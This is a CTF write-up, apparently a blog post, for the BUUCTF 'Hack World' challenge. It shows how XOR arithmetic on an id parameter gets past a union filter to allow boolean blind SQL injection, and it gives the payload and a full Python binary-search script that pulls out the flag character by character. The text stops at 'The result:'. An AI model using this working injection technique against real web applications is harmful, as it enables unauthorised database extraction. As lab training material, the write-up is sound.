buuctf

    Tech  2022-07-16

    Hack World


    The challenge page says it is SQL injection and gives the table and column names (both flag). Fuzzing shows that many characters are filtered: union is blocked, but select and from are not. The id parameter only produces output for two values: id=1 returns "Hello, glzjin wants a girlfriend." and id=2 returns "Do you want to be my girlfriend?". The parameter also accepts XOR arithmetic, so a boolean condition can be folded into the id value: 0^(true) is 1 and 0^(false) is 0, which selects the "Hello" row or nothing. That gives a boolean blind injection for reading the flag, one character at a time, without needing union or any whitespace:

    id=0^(ascii(substr((select(flag)from(flag)),1,1))>1)

    Script for the blind injection (binary search on the ASCII value of each character; "Hello" in the response means the condition was true):

        import requests

        url = "http://37264524-68ca-4248-9566-848debbbf6fd.node3.buuoj.cn/index.php"
        payload = {"id": ""}
        result = ""

        for i in range(1, 50):
            # Binary search the ASCII value of the i-th flag character.
            # l starts at 32 so that a position past the end of the flag
            # (MySQL substr() returns '', ascii('') is 0) converges to 32
            # and triggers the break below instead of printing "!".
            l = 32
            r = 130
            mid = (l + r) >> 1
            while l < r:
                # id = 0 ^ (cond): 1 when the character is greater than mid, else 0
                payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)
                html = requests.post(url, data=payload)
                if "Hello" in html.text:  # id evaluated to 1 -> character > mid
                    l = mid + 1
                else:
                    r = mid
                mid = (l + r) >> 1
            if chr(mid) == " ":
                break
            result = result + chr(mid)
            print(result)

        print("flag: ", result)

    The result: